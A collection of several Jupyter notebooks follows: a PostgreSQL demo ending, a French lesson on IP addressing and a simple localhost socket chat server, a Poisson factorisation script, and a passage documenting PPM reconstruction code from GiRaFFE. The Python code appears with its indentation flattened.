print('\nSample of associations in the database:')
cursor.execute('SELECT disease_id, drug_id FROM associations LIMIT 3;')
records = cursor.fetchall()
for i in records:
print(i)
# -
# ## What's next?
#
# * You can also connect to the PostgreSQL database using the terminal:
#
# ```
# sudo apt install postgresql
# psql -h postgresql-demo -U postgres
# ```
# * Setup a [pgAdmin](https://www.pgadmin.org/docs/pgadmin4/latest/container_deployment.html) user interface to manage the database
# * Take a look into visualization tools to explore your database, such as Apache Superset.
|
postgresql.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Python 7 - Découverte du réseau et serveur
#
# > application socket serveur basique
#
# - toc: true
# - badges: true
# - comments: false
# - categories: [ISN, socket]
# ## Partie I : Adresses réseau
# Sur un réseau, chaque ordinateur a une adresse appelée adresse IP (Internet Protocol).
# « Internet Protocol » est un mécanisme inventé pour le réseau internet mais qui est maintenant utilisé pratiquement tous les réseaux, y compris les petits réseaux domestiques.
#
# Sur Internet, chaque machine connectée au réseau (ordinateur, téléphone, ...) possède une «adresse IP» unique. Cette adresse est constituée de 4 octets.
# 1) Combien de machines peut-on connecter sur Internet ?
#
# Répondez ici...
# 2) Ce protocole (nommé ipv4) a manifestement atteint ses limites. Un nouveau protocole, nommé ipv6 est en cours de déploiement sur Internet. Il utilise des adresses de 128 bits.
# Combien de machines pourront être connectées simultanément grâce à ce nouveau protocole ?
#
# Répondez ici...
# 3) Ouvrir un terminal et taper à l’invite de commande la commande $\fbox{/sbin/ifconfig}$
#
# a. Quelle est votre adresse IP ? ...
#
# b. Quelle est l'adresse IP de votre voisin ? ...
#
# c. Quelle partie votre adresse IP et celle de votre voisin ont-elle en commun ? ...
#
# d. Vous pouvez tenter de communiquer avec votre voisin au travers de la commande
# $\fbox{ping Adresse_Ip.De.Votre.Voisin}$ dans le terminal. Qu’obtenez-vous ?
# ## Partie II : Les noms sur internet
# Les ordinateurs utilisent les adresses IP mais il est rare que les humains les retiennent : on préfère utiliser des noms.
#
# Chaque ordinateur peut avoir un - ou plusieurs - nom. Dans un réseau il existe des ordinateurs dont la seule fonction est de tenir à jour les tables de correspondance entre les adresses IP et les noms dans une sorte d’annuaire semblable aux annuaires téléphoniques : les serveurs de noms (en abrégé *DNS*)
# 1) Dans un terminal, taper $\fbox{ping lcs}$ puis $\fbox{ping google.fr}$ .
# 2) Quelle est l’adresse IP du Lcs ?
#
# Répondez ici ...
# 3) Quelle est l’adresse IP de Google.fr ?
#
# Répondez ici ...
# ## Partie III : Principe de la communication Client/Serveur
# Un ordinateur (le ***serveur***) fait tourner en permanence un programme (un ***service***) qui
# - attend que d’autres ordinateurs (les ***clients***) le sollicitent
# - gère les échanges une fois la liaison établie
# 1) Citer des exemples de communications client/serveur dans vos usages quotidien des réseaux.
#
# Votre réponse ici ...
# 2) Pour ces exemples, décrire le rôle du serveur et du client.
#
# Votre réponse ici
# ## Partie IV : Ecrire un programme serveur en Python
# Voici un programme serveur basique écrit en Python. On utilise ici la librairie ***socket*** qui gère la communication réseau en Python.
#
# Exécutez cette cellule puis ouvrez le classeur **Python7 - Reseau client** pour exécuter la partie cliente.
#
# Remarquez que quand le serveur tourne, le kernel python est monopolisé et ne permet plus l'exécution d'une autre cellule, d'où la nécessité de changer de classeur pour la partie cliente.
#
# Néanmoins, vous pourrez compléter la section suivante sur la compréhension du programme et répondre aux questions posées pendant que le serveur tourne.
# ### Le programme serveur
# +
from socket import *
### Mise en place du service ########
MON_IP ,PORT = '127.0.0.1' , 50000
service = socket(AF_INET, SOCK_STREAM)
try:
service.bind((MON_IP , PORT))
tourne = True
except error :
print("Impossible de démarrer le service.")
tourne = False
while tourne :
print("Serveur prêt, en attente de requètes ...")
service.listen(1)
### Mise en place d?une connexion ########
connexion, adresse = service.accept()
print("Client connecté. : ",adresse[0])
### Dialogue avec le client ########
message = ""
while message.upper() != "FIN" :
message = input("moi > ")
connexion.send(message.encode("utf8"))
if message.upper() != "FIN" :
message = connexion.recv(1024).decode("utf8")
print("client > ", message)
connexion.close()
ch = input("<R>ecommencer <T>erminer ? ")
ch = ch[0].upper()
if ch =='T':
tourne = False
service.close()
# -
# ### Compréhension du programme serveur
# 1) Sur quelle adresse IP le serveur va t-il répondre ?
#
# Votre réponse ...
# 2) Une même machine peut héberger plusieurs services (programmes serveur). En effet le Lcs héberge un serveur web, un serveur de base de données, des services de messagerie, etc... . Pour éviter que ces services entrent en conflit, on utilise en plus de l’adresse IP un numéro de port qui peut être vu comme un canal de communication. Ce numéro de port est compris entre 1024 et 65535.
#
# a. Quel numéro de port est utilisé dans le programme étudié ? ...
#
# b. Changer le numéro de port sur le serveur. Que se passe t-il au niveau du client ? ...
#
# c. Adapter également le numéro de port sur le client. Le programme fonctionne t-il à nouveau ? ...
# 3) Quelle commande est responsable sur le serveur de l’envoi du message au client ?
#
# Votre réponse ...
# 4) Écrire en langage naturel l’algorithme correspondant au serveur
#
# Votre réponse ...
# 5) Quel message taper coté client ou serveur pour mettre fin à la communication ?
#
# Votre réponse ...
# # A vous de jouer : Jeu du juste prix en réseau
# L’objectif de l’activité est de réaliser un jeu de juste prix en réseau.
#
# 1) Décrire le rôle du serveur et du client.
#
# Votre réponse ...
# 2) Écrire l’algorithme en langage naturel d’un jeu de juste prix en réseau. Vous devrez pour cela écrire l’algorithme du serveur et du client.
# 3) en vous aidant des commandes vues dans l’exemple étudier, modifier le programme serveur
# étudié afin de programmer un jeu de juste prix en réseau. On pourra essayer de deviner un nombre
# entier entre 1 et 100.
# +
# Votre programme ici...
# -
|
_notebooks/2020-03-07-Python7 - Reseau serveur.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:bml]
# language: python
# name: conda-env-bml-py
# ---
import edward as ed
from edward.models import Poisson,Gamma
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import helper_func
import math
import models
import scipy.special as sp
from scipy.misc import logsumexp
import gc
sess = tf.InteractiveSession()
init = tf.global_variables_initializer()
init.run()
dataset = 'bibx'
full_X,x,test_mask1 = helper_func.load_data(dataset)
dataset = 'biby'
full_Y,y,test_mask2 = helper_func.load_data(dataset)
metric = 'mae_nz_all'
x = full_X #*x_train_mask
y = full_Y #*y_train_mask
tot = 100
tot += 1
test_every = 20
non_zero_x = helper_func.non_zero_entries(x)
non_zero_y = helper_func.non_zero_entries(y)
no_sample = 20
score = []
K = 50
users = full_X.shape[0]
items1 = full_X.shape[1]
items2 = full_Y.shape[1]
param1 = models.hpf(users,items1)
param2 = models.hpf(users,items2)
a = a_c = c = c_c = 0.3
b_c = d_c = 1.0
# +
kappa_shp = np.random.uniform(low=0.1,size=users)
kappa_rte = np.random.uniform(low=0.1,size=users)
tau_shp = np.random.uniform(low=0.1,size=items1)
tau_rte = np.random.uniform(low=0.1,size=items1)
rho_shp = np.random.uniform(low=0.1,size=items2)
rho_rte = np.random.uniform(low=0.1,size=items2)
phi = np.zeros([users,items1,K])
ohm = np.zeros([users,items2,K])
gam_shp = np.random.uniform(low=0.1,size=[users,K])
gam_rte = np.random.uniform(low=0.1,size=[users,K])
lam_shp = np.random.uniform(low=0.1,size=[items1,K])
lam_rte = np.random.uniform(low=0.1,size=[items1,K])
mu_shp = np.random.uniform(low=0.1,size=[items2,K])
mu_rte = np.random.uniform(low=0.1,size=[items2,K])
# +
for u in range(0,users):
kappa_shp[u] = a_c + K*a
for i in range(0,items1):
tau_shp[i] = c_c + K*c
for j in range(0,items2):
rho_shp[j] = c_c + K*c
for ite in range(0,tot):
print(ite)
for ui in non_zero_x:
u = ui[0]
i = ui[1]
phi[u,i,:]= sp.digamma(gam_shp[u,:])-np.log(gam_rte[u,:])+sp.digamma(lam_shp[i,:])-np.log(lam_rte[i,:])
norm = logsumexp(phi[u,i,:])
phi[u,i,:] = np.exp(phi[u,i,:]-norm)
for uj in non_zero_y:
u = uj[0]
j = uj[1]
ohm[u,j,:]= sp.digamma(gam_shp[u,:])-np.log(gam_rte[u,:])+sp.digamma(mu_shp[j,:])-np.log(mu_rte[j,:])
norm = logsumexp(ohm[u,j,:])
ohm[u,j,:] = np.exp(ohm[u,j,:]-norm)
for u in range(0,users):
for k in range(0,K):
gam_shp[u,k] = a + np.inner(x[u,:],phi[u,:,k]) + np.inner(y[u,:],ohm[u,:,k])
gam_rte[u,k] = (kappa_shp[u]/kappa_rte[u]) + np.sum(lam_shp[:,k]/lam_rte[:,k]) + np.sum(mu_shp[:,k]/mu_rte[:,k])
kappa_rte[u] = (a_c/b_c) + np.sum(gam_shp[u,:]/gam_rte[u,:])
for i in range(0,items1):
for k in range(0,K):
lam_shp[i,k] = c + np.inner(x[:,i],phi[:,i,k])
lam_rte[i,k] = (tau_shp[i]/tau_rte[i]) + np.sum(gam_shp[:,k]/gam_rte[:,k])
tau_rte[i] = (c_c/d_c) + np.sum(lam_shp[i,:]/lam_rte[i,:])
for j in range(0,items2):
for k in range(0,K):
mu_shp[j,k] = c + np.inner(y[:,j],ohm[:,j,k])
mu_rte[j,k] = (rho_shp[j]/rho_rte[j]) + np.sum(gam_shp[:,k]/gam_rte[:,k])
rho_rte[j] = (c_c/d_c) + np.sum(mu_shp[j,:]/mu_rte[j,:])
if ite%test_every == 0:
q_theta = Gamma(gam_shp,gam_rte)
q_beta1 = Gamma(np.transpose(lam_shp),np.transpose(lam_rte))
q_beta2 = Gamma(np.transpose(mu_shp),np.transpose(mu_rte))
beta1_sample = q_beta1.sample(no_sample).eval()
beta2_sample = q_beta2.sample(no_sample).eval()
theta_sample = q_theta.sample(no_sample).eval()
score.append(helper_func.check(param1,theta_sample,beta1_sample,test_mask1,full_X,metric=metric) \
+helper_func.check(param2,theta_sample,beta2_sample,test_mask2,full_Y,metric=metric))
gc.collect()
# +
# to_save = [[gam_shp,gam_rte],[lam_shp,lam_rte],[mu_shp,mu_rte]]
# PIK = "../models/bibtex_hpf_"+str(K)+".dat"
# with open(PIK, "wb") as f:
# pickle.dump(to_save, f)
# +
#check(0)
# -
plt.plot(score)
plt.show()
# np.savetxt("mae_d_k05.txt",mae_val)
|
algos/.ipynb_checkpoints/hpf_dual-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# <script async src="https://www.googletagmanager.com/gtag/js?id=UA-59152712-8"></script>
# <script>
# window.dataLayer = window.dataLayer || [];
# function gtag(){dataLayer.push(arguments);}
# gtag('js', new Date());
#
# gtag('config', 'UA-59152712-8');
# </script>
#
# # The Piecewise-Parabolic Method
#
# This notebook documents the function from the original `GiRaFFE` that implements the reconstruction algorithm used by the piecewise-parabolic method (PPM) of [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf).
#
# The differential equations that `GiRaFFE` evolves have two different terms that contribute to the time evolution of some quantity: the flux term and the source term. The PPM method is what the original `GiRaFFE` uses to handle the flux term; hopefully, using this instead of finite-differencing will fix some of the problems we've been having with `GiRaFFE_HO`.
#
# This algorithm is not quite as accessible as the much simpler finite-difference methods; as such, [this notebook](https://mybinder.org/v2/gh/python-hydro/how_to_write_a_hydro_code/master) is recommended as an introduction. It covers a simpler reconstruction scheme, and proved useful in preparing the documentation for this more complicated scheme.
#
# The algorithm for finite-volume methods in general is as follows:
#
# 1. **The Reconstruction Step (This notebook)**
# 1. **Within each cell, fit to a function that conserves the volume in that cell using information from the neighboring cells**
# * **For PPM, we will naturally use parabolas**
# 1. **Use that fit to define the state at the left and right interface of each cell**
# 1. **Apply a slope limiter to mitigate Gibbs phenomenon**
# 1. Solving the Riemann Problem
# 1. Use the left and right reconstructed states to calculate the unique state at boundary
# 1. Use the unique state to estimate the derivative in the cell
# 1. Repeat the above for each conservative gridfunction in each direction
# <a id='toc'></a>
#
# # Table of Contents
# $$\label{toc}$$
#
# This notebook is organized as follows
#
# 0. [Step 0](#prelim): Preliminaries
# 1. [Step 1](#reconstruction): The reconstruction function
# 1. [Step 1.a](#define): Some definitions and declarations
# 1. [Step 1.b](#func): The function definition
# 1. [Step 1.c](#face): Interpolate the face values
# 1. [Step 1.d](#monotonize): Monotonize the values within each cell
# 1. [Step 1.e](#shift): Shift indices
# 1. [Step 2](#slope_limit): The slope limiter
# 1. [Step 3](#monotonize_def): The monotonization algorithm
# 1. [Step 4](#latex_pdf_output): Output this notebook to $\LaTeX$-formatted PDF file
# <a id='prelim'></a>
#
# ## Step 0: Preliminaries \[Back to [top](#toc)\]
# $$\label{prelim}$$
#
# This first block of code just sets up a subdirectory within `GiRaFFE_standalone_Ccodes/` to which we will write the C code.
import cmdline_helper as cmd
import os
outdir = "GiRaFFE_standalone_Ccodes/PPM"
cmd.mkdir(os.path.join(outdir,"/"))
# When we convert the code to work with NRPy+, we will be able to make a simplification: since `GiRaFFE_HO` does not use staggered grids, we will be able to skip reconstructing the staggered quantities
#
# The structure `gf_and_gz_struct` is a C++ structure used to keep track of ghostzone information between routines. It contains a pointer and two arrays. It is specified by the following code:
#
# ```c
# // Keeping track of ghostzones between routines is a nightmare, so
# // we instead attach ghostzone info to each gridfunction and set
# // the ghostzone information correctly within each routine.
# struct gf_and_gz_struct {
# REAL *gf;
# int gz_lo[4],gz_hi[4];
# };
# ```
# <a id='reconstruction'></a>
#
# ## Step 1: The reconstruction function \[Back to [top](#toc)\]
# $$\label{reconstruction}$$
#
# <a id='define'></a>
#
# ### Step 1.a: Some definitions and declarations \[Back to [top](#toc)\]
# $$\label{define}$$
#
# This file contains the functions necessary for reconstruction. It is based on Colella & Woodward PPM in the case where pressure and density $P = \rho = 0$.
#
# We start by defining the values of `MINUS2`...`PLUS2` as $\{0, \ldots ,4\}$ for the sake of convenience later on; we also define `MAXNUMINDICES` as 5 so we can easily loop over the above. We include `loop_defines_reconstruction.h` for some macros that will allow us to conveniently write common loops that we will use (this will be imminently replaced with the NRPy+ standard `LOOP_REGION` **(Actually, might be better to directly port these)**) and give the function prototypes for our slope limiter, `slope_limit()`, and our monotization algorithm, `monotonize()`.
# +
# %%writefile $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
/*****************************************
* PPM Reconstruction Interface.
* Zacharia<NAME> (2013)
*
* This version of PPM implements the standard
* Colella & Woodward PPM, but in the GRFFE
* limit, where P=rho=0. Thus, e.g., ftilde=0.
*****************************************/
#define MINUS2 0
#define MINUS1 1
#define PLUS0 2
#define PLUS1 3
#define PLUS2 4
#define MAXNUMINDICES 5
// ^^^^^^^^^^^^^ Be _sure_ to define MAXNUMINDICES appropriately!
// You'll find the #define's for LOOP_DEFINE and SET_INDEX_ARRAYS inside:
#include "loop_defines_reconstruction.h"
static inline REAL slope_limit(const REAL dU,const REAL dUp1);
static inline void monotonize(const REAL U,REAL &Ur,REAL &Ul);
# -
# <a id='func'></a>
#
# ### Step 1.b: The function definition \[Back to [top](#toc)\]
# $$\label{func}$$
#
# Here, we start the function definition for the main function for our reconstruction, `reconstruct_set_of_prims_PPM_GRFFE()`. Among its parameters are the arrays that define the grid (that will need to be replaced with NRPy+ equivalents), a flux direction, the integer array specifying which primitives to reconstruct (as well as the number of primitives to reconstruct), the input structure `in_prims`, the output structures `out_prims_r` and `out_prims_l`, and a temporary array (this will be used to help switch variable names).
#
# We then check the number of ghostzones and error out if there are too few - this method requires three. Note the `for` loop here; it continues through the next two cells as well, looping over each primitive we will reconstruct in the chosen direction.
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
static void reconstruct_set_of_prims_PPM_GRFFE(const cGH *cctkGH,const int *cctk_lsh,const int flux_dirn,const int num_prims_to_reconstruct,const int *which_prims_to_reconstruct,
const gf_and_gz_struct *in_prims,gf_and_gz_struct *out_prims_r,gf_and_gz_struct *out_prims_l, REAL *temporary) {
REAL U[MAXNUMVARS][MAXNUMINDICES],dU[MAXNUMVARS][MAXNUMINDICES],slope_lim_dU[MAXNUMVARS][MAXNUMINDICES],
Ur[MAXNUMVARS][MAXNUMINDICES],Ul[MAXNUMVARS][MAXNUMINDICES];
int ijkgz_lo_hi[4][2];
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
if(in_prims[whichvar].gz_lo[flux_dirn]!=0 || in_prims[whichvar].gz_hi[flux_dirn]!=0) {
CCTK_VError(VERR_DEF_PARAMS,"TOO MANY GZ'S! WHICHVAR=%d: %d %d %d : %d %d %d DIRECTION %d",whichvar,
in_prims[whichvar].gz_lo[1],in_prims[whichvar].gz_lo[2],in_prims[whichvar].gz_lo[3],
in_prims[whichvar].gz_hi[1],in_prims[whichvar].gz_hi[2],in_prims[whichvar].gz_hi[3],flux_dirn);
}
# -
# <a id='face'></a>
#
# ### Step 1.c: Interpolate the face values \[Back to [top](#toc)\]
# $$\label{face}$$
#
# In Loop 1, we will interpolate the face values at the left and right interfaces, `Ur` and `Ul`, respectively. This is done on a point-by-point basis as defined by the `LOOP_DEFINE`.
#
# After reading in the relevant values from memory, we calculate thesimple `dU`:
# \begin{align}
# dU_{-1} &= U_{-1} - U_{-2} \\
# dU_{+0} &= U_{+0} - U_{-1} \\
# dU_{+1} &= U_{+1} - U_{+0} \\
# dU_{+2} &= U_{+2} - U_{+1}. \\
# \end{align}
# From that, we compute the slope-limited `slope_lim_dU`, or $\nabla U$ (see [below](#slope_limit)). Then, we compute the face values using eq. A1 from [arxiv:astro-ph/050342](http://arxiv.org/pdf/astro-ph/0503420.pdf), adapted from 1.9 in [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf):
# \begin{align}
# U_r &= \frac{1}{2} \left( U_{+1} + U_{+0} \right) + \frac{1}{6} \left( \nabla U_{+0} - \nabla U_{+1} \right) \\
# U_l &= \frac{1}{2} \left( U_{+0} + U_{-1} \right) + \frac{1}{6} \left( \nabla U_{-1} - \nabla U_{+0} \right). \\
# \end{align}
# (Note, however, that we use the standard coefficient $1/6$ instead of $1/8$.) Finally, we write the values to memory in the output structures.
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 1: Interpolate to Ur and Ul, which are face values ***
// You will find that Ur depends on U at MINUS1,PLUS0, PLUS1,PLUS2, and
// Ul depends on U at MINUS2,MINUS1,PLUS0,PLUS1.
// However, we define the below loop from MINUS2 to PLUS2. Why not split
// this up and get additional points? Maybe we should. In GRMHD, the
// reason is that later on, Ur and Ul depend on ftilde, which is
// defined from MINUS2 to PLUS2, so we would lose those points anyway.
// But in GRFFE, ftilde is set to zero, so there may be a potential
// for boosting performance here.
LOOP_DEFINE(2,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(-2,2,flux_dirn);
/* *** LOOP 1a: READ INPUT *** */
// Read in a primitive at all gridpoints between m = MINUS2 & PLUS2, where m's direction is given by flux_dirn. Store to U.
for(int ii=MINUS2;ii<=PLUS2;ii++) U[whichvar][ii] = in_prims[whichvar].gf[index_arr[flux_dirn][ii]];
/* *** LOOP 1b: DO COMPUTATION *** */
/* First, compute simple dU = U(i) - U(i-1), where direction of i
* is given by flux_dirn, and U is a primitive variable:
* {vx,vy,vz,Bx,By,Bz}. */
// Note that for Ur and Ul at i, we must compute dU(i-1),dU(i),dU(i+1),
// and dU(i+2)
dU[whichvar][MINUS1] = U[whichvar][MINUS1]- U[whichvar][MINUS2];
dU[whichvar][PLUS0] = U[whichvar][PLUS0] - U[whichvar][MINUS1];
dU[whichvar][PLUS1] = U[whichvar][PLUS1] - U[whichvar][PLUS0];
dU[whichvar][PLUS2] = U[whichvar][PLUS2] - U[whichvar][PLUS1];
// Then, compute slope-limited dU, using MC slope limiter:
slope_lim_dU[whichvar][MINUS1]=slope_limit(dU[whichvar][MINUS1],dU[whichvar][PLUS0]);
slope_lim_dU[whichvar][PLUS0] =slope_limit(dU[whichvar][PLUS0], dU[whichvar][PLUS1]);
slope_lim_dU[whichvar][PLUS1] =slope_limit(dU[whichvar][PLUS1], dU[whichvar][PLUS2]);
// Finally, compute face values Ur and Ul based on the PPM prescription
// (Eq. A1 in http://arxiv.org/pdf/astro-ph/0503420.pdf, but using standard 1/6=(1.0/6.0) coefficient)
// Ur[PLUS0] represents U(i+1/2)
// We applied a simplification to the following line: Ur=U+0.5*(U(i+1)-U) + ... = 0.5*(U(i+1)+U) + ...
Ur[whichvar][PLUS0] = 0.5*(U[whichvar][PLUS1] + U[whichvar][PLUS0] ) + (1.0/6.0)*(slope_lim_dU[whichvar][PLUS0] - slope_lim_dU[whichvar][PLUS1]);
// Ul[PLUS0] represents U(i-1/2)
// We applied a simplification to the following line: Ul=U(i-1)+0.5*(U-U(i-1)) + ... = 0.5*(U+U(i-1)) + ...
Ul[whichvar][PLUS0] = 0.5*(U[whichvar][PLUS0] + U[whichvar][MINUS1]) + (1.0/6.0)*(slope_lim_dU[whichvar][MINUS1] - slope_lim_dU[whichvar][PLUS0]);
/* *** LOOP 1c: WRITE OUTPUT *** */
// Store right face values to {vxr,vyr,vzr,Bxr,Byr,Bzr},
// and left face values to {vxl,vyl,vzl,Bxl,Byl,Bzl}
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ur[whichvar][PLUS0];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ul[whichvar][PLUS0];
}
# <a id='monotonize'></a>
#
# ### Step 1.d: Monotonize the values within each cell \[Back to [top](#toc)\]
# $$\label{monotonize}$$
#
# We skip Loop 2 in GRFFE; then, we flatten the data in Loop 3 (but since we flattenbased on `ftilde_gf`, which is 0 in GRFFE, we again don't really do anything). Also in Loop 3, we call the `monotonize()` function on the face values. This function adjusts the face values to ensure that the data is monotonic within each cell to avoid the Gibbs phenomenon.
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 2 (REMOVED): STEEPEN RHOB. RHOB DOES NOT EXIST IN GRFFE EQUATIONS ***
}
// *** LOOP 3: FLATTEN BASED ON FTILDE AND MONOTONIZE ***
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
// ftilde() depends on P(MINUS2,MINUS1,PLUS1,PLUS2), THUS IS SET TO ZERO IN GRFFE
LOOP_DEFINE(2,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(0,0,flux_dirn);
U[whichvar][PLUS0] = in_prims[whichvar].gf[index_arr[flux_dirn][PLUS0]];
Ur[whichvar][PLUS0] = out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]];
Ul[whichvar][PLUS0] = out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]];
// ftilde_gf was computed in the function compute_ftilde_gf(), called before this routine
//REAL ftilde = ftilde_gf[index_arr[flux_dirn][PLUS0]];
// ...and then flatten (local operation)
Ur[whichvar][PLUS0] = Ur[whichvar][PLUS0];
Ul[whichvar][PLUS0] = Ul[whichvar][PLUS0];
// Then monotonize
monotonize(U[whichvar][PLUS0],Ur[whichvar][PLUS0],Ul[whichvar][PLUS0]);
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ur[whichvar][PLUS0];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ul[whichvar][PLUS0];
}
// Note: ftilde=0 in GRFFE. Ur depends on ftilde, which depends on points of U between MINUS2 and PLUS2
out_prims_r[whichvar].gz_lo[flux_dirn]+=2;
out_prims_r[whichvar].gz_hi[flux_dirn]+=2;
// Note: ftilde=0 in GRFFE. Ul depends on ftilde, which depends on points of U between MINUS2 and PLUS2
out_prims_l[whichvar].gz_lo[flux_dirn]+=2;
out_prims_l[whichvar].gz_hi[flux_dirn]+=2;
}
# <a id='shift'></a>
#
# ### Step 1.e: Shift indices \[Back to [top](#toc)\]
# $$\label{shift}$$
#
# In Loop 4, we will shift the indices of `Ur` and `Ul`. So far, we have been concerned with the behavior of the data within a single cell. In that context, it makes sense to call the value of data at the left end of the cell `Ul` and the data at the right end of the cell `Ur`. However, going forward, we will be concerned about the behavior of the data at the interface between cells. In this context, it sense to call the value of data on the left of the interface (which is at the right end of the cell!) `Ul` and the data on the right of the interface `Ur`. So, using the array `temporary`, we switch the two names.
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 4: SHIFT Ur AND Ul ***
/* Currently face values are set so that
* a) Ur(i) represents U(i+1/2), and
* b) Ul(i) represents U(i-1/2)
* Here, we shift so that the indices are consistent:
* a) U(i-1/2+epsilon) = oldUl(i) = newUr(i)
* b) U(i-1/2-epsilon) = oldUr(i-1) = newUl(i)
* Note that this step is not strictly necessary if you keep
* track of indices when computing the flux. */
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
LOOP_DEFINE(3,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(-1,0,flux_dirn);
temporary[index_arr[flux_dirn][PLUS0]] = out_prims_r[whichvar].gf[index_arr[flux_dirn][MINUS1]];
}
LOOP_DEFINE(3,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(0,0,flux_dirn);
// Then shift so that Ur represents the gridpoint at i-1/2+epsilon,
// and Ul represents the gridpoint at i-1/2-epsilon.
// Ur(i-1/2) = Ul(i-1/2) = U(i-1/2+epsilon)
// Ul(i-1/2) = Ur(i+1/2 - 1) = U(i-1/2-epsilon)
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = temporary[index_arr[flux_dirn][PLUS0]];
}
// Ul was just shifted, so we lost another ghostzone.
out_prims_l[whichvar].gz_lo[flux_dirn]+=1;
out_prims_l[whichvar].gz_hi[flux_dirn]+=0;
// As for Ur, we didn't need to get rid of another ghostzone,
// but we did ... seems wasteful!
out_prims_r[whichvar].gz_lo[flux_dirn]+=1;
out_prims_r[whichvar].gz_hi[flux_dirn]+=0;
}
}
# -
# <a id='slope_limit'></a>
#
# ## Step 2: The slope limiter \[Back to [top](#toc)\]
# $$\label{slope_limit}$$
#
# The first function here implements the Monotonized Central (MC) reconstruction slope limiter:
# $$ MC(a,b) = \left \{ \begin{array}{ll}
# 0 & {\rm if} ab \leq 0 \\
# {\rm sign}(a) \min(2|a|,2|b|, |a+b|/2) & {\rm otherwise.}
# \end{array} \right.
# $$
#
# This is adapted from eq. 1.8 of [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf).
#
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// Set SLOPE_LIMITER_COEFF = 2.0 for MC, 1 for minmod
#define SLOPE_LIMITER_COEFF 2.0
//Eq. 60 in JOURNAL OF COMPUTATIONAL PHYSICS 123, 1-14 (1996)
// [note the factor of 2 missing in the |a_{j+1} - a_{j}| term].
// Recall that dU = U_{i} - U_{i-1}.
static inline REAL slope_limit(const REAL dU,const REAL dUp1) {
if(dU*dUp1 > 0.0) {
//delta_m_U=0.5 * [ (u_(i+1)-u_i) + (u_i-u_(i-1)) ] = (u_(i+1) - u_(i-1))/2 <-- first derivative, second-order; this should happen most of the time (smooth flows)
const REAL delta_m_U = 0.5*(dU + dUp1);
// EXPLANATION OF BELOW LINE OF CODE.
// In short, sign_delta_a_j = sign(delta_m_U) = (0.0 < delta_m_U) - (delta_m_U < 0.0).
// If delta_m_U>0, then (0.0 < delta_m_U)==1, and (delta_m_U < 0.0)==0, so sign_delta_a_j=+1
// If delta_m_U<0, then (0.0 < delta_m_U)==0, and (delta_m_U < 0.0)==1, so sign_delta_a_j=-1
// If delta_m_U==0,then (0.0 < delta_m_U)==0, and (delta_m_U < 0.0)==0, so sign_delta_a_j=0
const int sign_delta_m_U = (0.0 < delta_m_U) - (delta_m_U < 0.0);
//Decide whether to use 2nd order derivative or first-order derivative, limiting slope.
return sign_delta_m_U*MIN(fabs(delta_m_U),MIN(SLOPE_LIMITER_COEFF*fabs(dUp1),SLOPE_LIMITER_COEFF*fabs(dU)));
}
return 0.0;
}
# -
# <a id='monotonize_def'></a>
#
# ## Step 3: The monotonization algorithm \[Back to [top](#toc)\]
# $$\label{monotonize_def}$$
#
# The next function monotonizes the slopes using the algorithm from [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf), eq. 1.10. We want the slope to be monotonic in a cell in order to reduce the impact of the Gibbs phenomenon. So, we consider three values in the cell: the cell average, `U`; on the left interface of the cell, `Ul`; and on the right interface of the cell, `Ur`. The goal of the algorithm is to ensure monotonicity; so, it first checks to see if the cell contains a local extremum. If it does, we make the interpolation function a constant.We must then also consider the case where `U` is "close" to `Ur` or `Ul`, and an interpolating polynomial between them would not be monotonic over the cell. So, the basic algorithm is as follows:
#
# * `dU = Ur - Ul`
# * `mU = 0.5*(Ur+Ul)`.
# * If the cell has an extremum:
# * `Ur = U`
# * `Ul = U`
# * If `U` is too close to `Ul`
# * Move `Ul` farther away
# * If `U` is too close to `Ur`
# * Move `Ur` farther away
#
